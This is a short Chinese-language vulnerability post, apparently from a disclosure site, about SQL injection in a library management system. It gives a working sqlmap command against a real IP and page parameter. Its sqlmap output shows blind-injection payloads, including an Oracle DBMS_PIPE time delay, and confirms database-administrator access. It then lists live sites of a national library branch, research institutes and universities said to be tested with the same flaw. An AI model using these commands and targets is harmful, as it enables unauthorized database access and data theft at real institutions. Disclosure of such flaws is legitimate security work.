某通用图书馆管理系统SQL注入,主要是某个某页面存在SQL注射。
sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 --is-dba<br> <br> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br> ---<br> Place: GET<br> Parameter: ID<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: ID=123 AND 7478=7478<br> <br> Type: AND/OR time-based blind<br> Title: Oracle AND time-based blind<br> Payload: ID=123 AND 9273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(111)||CHR(105)||CHR(98),5)<br> ---<br> [11:34:18] [INFO] the back-end DBMS is Oracle<br> web server operating system: Windows 2008 R2 or 7<br> web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727<br> back-end DBMS: Oracle<br> [11:34:18] [INFO] testing if current user is DBA<br> current user is DBA: True<br> [11:34:25] [INFO] fetched data logged to text files under '/Users/Leek/Desktop/sqlmap-dev/output/219.242.65.10'
DBA==True
在它的客户名单里测试了几个,
国家图书馆中央社会主义分馆:http://www.zysylib.org.cn/
中国科学院物理研究所:http://libiop.iphy.ac.cn/
中国科学院软研所:http://124.16.136.160:8083/iscas_lib/
还有各种大学用户,
中国矿业大学:http://219.242.65.10/fsweb/Default.aspx
华东交通大学:http://lib.ecjtu.jx.cn:80/gdweb
华北科技学院:http://211.81.174.140/